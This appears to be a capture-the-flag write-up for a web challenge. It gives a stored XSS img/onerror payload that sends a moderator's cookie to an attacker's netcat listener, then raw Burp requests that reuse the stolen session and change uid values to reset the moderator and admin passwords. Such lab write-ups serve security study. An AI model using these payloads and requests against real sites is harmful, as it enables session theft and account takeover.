Initial foothold

XSS injection in the tickets submit form to steal moderator cookie:

Set up listenner on a public server

nc -nlvp 8080

Submit this payload on the support ticket form:

<img src=x onerror="this.src='[<http://51.15.X.Z:8080/?'+document.cookie>](<http://51.15.x.z:8080/?%27+document.cookie>); this.removeAttribute('onerror');">

In burp repeater changed moderator password with the session stealed cookie:

POST /api/users/update HTTP/1.1
Host: 68.183.37.6:32165
Content-Length: 32
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: [<http://68.183.37.6:32165>](<http://68.183.37.6:32165/>)
Referer: [<http://68.183.37.6:32165/settings>](<http://68.183.37.6:32165/settings>)
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im1vZGVyYXRvciIsInVpZCI6MTAwLCJpYXQiOjE2NTI3ODYyNTh9.khh1AmDJ8UNKCRieovxmWvVFmMIEhOGdW5dOwCd25mQ
Connection: close
{"password":"test123","uid":"100"}

Admin login

No flag in moderator access, so trying different "uid" Found uid=1 for admin, logged in with new passord:

POST /api/users/update HTTP/1.1
Host: 68.183.37.6:32165
Content-Length: 32
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: [<http://68.183.37.6:32165>](<http://68.183.37.6:32165/>)
Referer: [<http://68.183.37.6:32165/settings>](<http://68.183.37.6:32165/settings>)
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im1vZGVyYXRvciIsInVpZCI6MTAwLCJpYXQiOjE2NTI3ODYyNTh9.khh1AmDJ8UNKCRieovxmWvVFmMIEhOGdW5dOwCd25mQ
Connection: close
{"password":"test123","uid":"1"}

Connect with the new credentials admin:test123

Untitled